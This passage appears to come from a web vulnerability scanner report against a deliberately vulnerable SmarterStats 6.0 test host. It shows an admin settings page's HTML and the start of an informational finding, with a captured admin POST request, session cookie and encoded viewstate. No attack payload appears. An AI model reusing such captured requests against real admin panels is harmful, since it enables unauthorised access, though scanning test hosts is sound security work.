CwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAA5ARE5TUmVzb2x1dGlvbgH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAAEEROU1Jlc29sdXRpb25UYWILZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTEPMtYLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAhAT3B0aW9ucwH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAACk9wdGlvbnNUYWILZGSQJCJ0ZJF4czfRAd1YvNft0NIwVb/lNVJ+/doCYV1a" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel2',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Report Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
<div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           

<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>DNS Resolution</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Email</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
<div id="ctl00_MPH_UpdatePanel2">
   

<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />

<div id='ctl00_MPH_OptionsTab' class='' >
           <span id="ctl00_MPH_OptionsTab">
<table id="ctl00_MPH_tblOptions" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtDefaultStandardReportDayRange">
                   <td id="ctl00_MPH_txtDefaultStandardReportDayRange_Label" class="Indent Fixed">Standard Report Limit</td><td id="ctl00_MPH_txtDefaultStandardReportDayRange_Setting" class="Setting"><input name="ctl00$MPH$txtDefaultStandardReportDayRange_SettingText" type="text" value="62" size="3" id="ctl00_MPH_txtDefaultStandardReportDayRange_SettingText" class="text" /> Day(s)</td>
               </tr><tr id="ctl00_MPH_txtDefaultCustomReportDayRange">
                   <td id="ctl00_MPH_txtDefaultCustomReportDayRange_Label" class="Indent Fixed">Custom Report Limit</td><td id="ctl00_MPH_txtDefaultCustomReportDayRange_Setting" class="Setting"><input name="ctl00$MPH$txtDefaultCustomReportDayRange_SettingText" type="text" value="62" size="3" id="ctl00_MPH_txtDefaultCustomReportDayRange_SettingText" class="text" /> Day(s)</td>
               </tr><tr id="ctl00_MPH_txtCustomReportItemLimit">
                   <td id="ctl00_MPH_txtCustomReportItemLimit_Label" class="Indent Fixed">Max Items per Report</td><td id="ctl00_MPH_txtCustomReportItemLimit_Setting" class="Setting"><input name="ctl00$MPH$txtCustomReportItemLimit_SettingText" type="text" value="10" size="3" id="ctl00_MPH_txtCustomReportItemLimit_SettingText" class="text" /> Item(s)</td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_DNSResolutionTab' class='' style='display:none'>
           <span id="ctl00_MPH_DNSResolutionTab">
<table id="ctl00_MPH_Table1" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtMaxDNSThreads">
                   <td id="ctl00_MPH_txtMaxDNSThreads_Label" class="Indent Fixed">DNS Threads</td><td id="ctl00_MPH_txtMaxDNSThreads_Setting" class="Setting"><input name="ctl00$MPH$txtMaxDNSThreads_SettingText" type="text" value="100" size="3" id="ctl00_MPH_txtMaxDNSThreads_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_lstMaxRowsDns">
                   <td id="ctl00_MPH_lstMaxRowsDns_Label" class="Indent Fixed">Max Lookups per Report</td><td id="ctl00_MPH_lstMaxRowsDns_Setting" class="Setting"><select name="ctl00$MPH$lstMaxRowsDns_SettingDropDown" id="ctl00_MPH_lstMaxRowsDns_SettingDropDown">
                       <option value="-1">All Rows</option>
                       <option selected="selected" value="50">50</option>
                       <option value="100">100</option>
                       <option value="200">200</option>
                       <option value="300">300</option>
                       <option value="400">400</option>
                       <option value="500">500</option>
                       <option value="600">600</option>
                       <option value="700">700</option>
                       <option value="800">800</option>
                       <option value="900">900</option>
                       <option value="1000">1000</option>
                       <option value="1100">1100</option>
                       <option value="1200">1200</option>
                       <option value="1300">1300</option>
                       <option value="1400">1400</option>
                       <option value="1500">1500</option>
                       <option value="1600">1600</option>
                       <option value="1700">1700</option>
                       <option value="1800">1800</option>
                       <option value="1900">1900</option>
                       <option value="2000">2000</option>
                       <option value="2100">2100</option>
                       <option value="2200">2200</option>
                       <option value="2300">2300</option>
                       <option value="2400">2400</option>
                       <option value="2500">2500</option>
                       <option value="2600">2600</option>
                       <option value="2700">2700</option>
                       <option value="2800">2800</option>
                       <option value="2900">2900</option>
                       <option value="3000">3000</option>
                       <option value="3100">3100</option>
                       <option value="3200">3200</option>
                       <option value="3300">3300</option>
                       <option value="3400">3400</option>
                       <option value="3500">3500</option>
                       <option value="3600">3600</option>
                       <option value="3700">3700</option>
                       <option value="3800">3800</option>
                       <option value="3900">3900</option>
                       <option value="4000">4000</option>
                       <option value="4100">4100</option>
                       <option value="4200">4200</option>
                       <option value="4300">4300</option>
                       <option value="4400">4400</option>
                       <option value="4500">4500</option>
                       <option value="4600">4600</option>
                       <option value="4700">4700</option>
                       <option value="4800">4800</option>
                       <option value="4900">4900</option>
                       <option value="5000">5000</option>
                       <option value="5100">5100</option>
                       <option value="5200">5200</option>
                       <option value="5300">5300</option>
                       <option value="5400">5400</option>
                       <option value="5500">5500</option>
                       <option value="5600">5600</option>
                       <option value="5700">5700</option>
                       <option value="5800">5800</option>
                       <option value="5900">5900</option>
                       <option value="6000">6000</option>
                       <option value="6100">6100</option>
                       <option value="6200">6200</option>
                       <option value="6300">6300</option>
                       <option value="6400">6400</option>
                       <option value="6500">6500</option>
                       <option value="6600">6600</option>
                       <option value="6700">6700</option>
                       <option value="6800">6800</option>
                       <option value="6900">6900</option>
                       <option value="7000">7000</option>
                       <option value="7100">7100</option>
                       <option value="7200">7200</option>
                       <option value="7300">7300</option>
                       <option value="7400">7400</option>
                       <option value="7500">7500</option>
                       <option value="7600">7600</option>
                       <option value="7700">7700</option>
                       <option value="7800">7800</option>
                       <option value="7900">7900</option>
                       <option value="8000">8000</option>
                       <option value="8100">8100</option>
                       <option value="8200">8200</option>
                       <option value="8300">8300</option>
                       <option value="8400">8400</option>
                       <option value="8500">8500</option>
                       <option value="8600">8600</option>
                       <option value="8700">8700</option>
                       <option value="8800">8800</option>
                       <option value="8900">8900</option>
                       <option value="9000">9000</option>
                       <option value="9100">9100</option>
                       <option value="9200">9200</option>
                       <option value="9300">9300</option>
                       <option value="9400">9400</option>
                       <option value="9500">9500</option>
                       <option value="9600">9600</option>
                       <option value="9700">9700</option>
                       <option value="9800">9800</option>
                       <option value="9900">9900</option>
                       <option value="10000">10000</option>

                   </select></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_EmailTab' class='' style='display:none'>
           <span id="ctl00_MPH_EmailTab">
<table id="ctl00_MPH_tblAdministraativeEmails" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstSendInterval">
                   <td id="ctl00_MPH_lstSendInterval_Label" class="Indent Fixed">Processing Interval</td><td id="ctl00_MPH_lstSendInterval_Setting" class="Setting"><select name="ctl00$MPH$lstSendInterval_SettingDropDown" id="ctl00_MPH_lstSendInterval_SettingDropDown">
                       <option value="1">1</option>
                       <option selected="selected" value="2">2</option>
                       <option value="3">3</option>
                       <option value="4">4</option>
                       <option value="5">5</option>
                       <option value="6">6</option>
                       <option value="7">7</option>
                       <option value="8">8</option>
                       <option value="9">9</option>
                       <option value="10">10</option>
                       <option value="11">11</option>
                       <option value="12">12</option>

                   </select> Hour(s)</td>
               </tr><tr id="ctl00_MPH_lstSleepTime">
                   <td id="ctl00_MPH_lstSleepTime_Label" class="Indent Fixed">Sleep Between Reports</td><td id="ctl00_MPH_lstSleepTime_Setting" class="Setting"><select name="ctl00$MPH$lstSleepTime_SettingDropDown" id="ctl00_MPH_lstSleepTime_SettingDropDown">
                       <option value="1">1</option>
                       <option selected="selected" value="2">2</option>
                       <option value="3">3</option>
                       <option value="4">4</option>
                       <option value="5">5</option>
                       <option value="6">6</option>
                       <option value="7">7</option>
                       <option value="8">8</option>
                       <option value="9">9</option>
                       <option value="10">10</option>
                       <option value="11">11</option>
                       <option value="12">12</option>
                       <option value="13">13</option>
                       <option value="14">14</option>
                       <option value="15">15</option>
                       <option value="16">16</option>
                       <option value="17">17</option>
                       <option value="18">18</option>
                       <option value="19">19</option>
                       <option value="20">20</option>
                       <option value="21">21</option>
                       <option value="22">22</option>
                       <option value="23">23</option>
                       <option value="24">24</option>
                       <option value="25">25</option>
                       <option value="26">26</option>
                       <option value="27">27</option>
                       <option value="28">28</option>
                       <option value="29">29</option>
                       <option value="30">30</option>
                       <option value="31">31</option>
                       <option value="32">32</option>
                       <option value="33">33</option>
                       <option value="34">34</option>
                       <option value="35">35</option>
                       <option value="36">36</option>
                       <option value="37">37</option>
                       <option value="38">38</option>
                       <option value="39">39</option>
                       <option value="40">40</option>
                       <option value="41">41</option>
                       <option value="42">42</option>
                       <option value="43">43</option>
                       <option value="44">44</option>
                       <option value="45">45</option>
                       <option value="46">46</option>
                       <option value="47">47</option>
                       <option value="48">48</option>
                       <option value="49">49</option>
                       <option value="50">50</option>

                   </select> Millisecond(s)</td>
               </tr><tr id="ctl00_MPH_chkSendErrorsEnabled">
                   <td id="ctl00_MPH_chkSendErrorsEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSendErrorsEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkSendErrorsEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkSendErrorsEnabled_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkSendErrorsEnabled_SettingCheck">Enable admin error emails</label></td>
               </tr>
           </table>
</span></div>
       

</div>
   

</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmreportsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
$(function() { SetTopTitle('Report\x20Settings'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_DNSResolutionTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_EmailTab"},"ClientCallbacks":{}}); });
modules['vmNumber_txt']='Must be a number';
modules['vmNumberGreater_txt']='Must be {0} or greater';
$(function() {$vc({"lt":"Standard Report Limit","vcID":"ctl00_MPH_txtDefaultStandardReportDayRange_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Custom Report Limit","vcID":"ctl00_MPH_txtDefaultCustomReportDayRange_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Max Items per Report","vcID":"ctl00_MPH_txtCustomReportItemLimit_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
modules['vmNumberLess_txt']='Must be {0} or less';
$(function() {$vc({"lt":"DNS Threads","vcID":"ctl00_MPH_txtMaxDNSThreads_SettingText","VMs":["vmNumber","vmNumberGreater","vmNumberLess"],"VPs":{"vmRequired":true,"vmNumberGreater":1,"vmNumberLess":2000}},false);});
//]]>
</script>
</form>
</body>
</html>


11.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGF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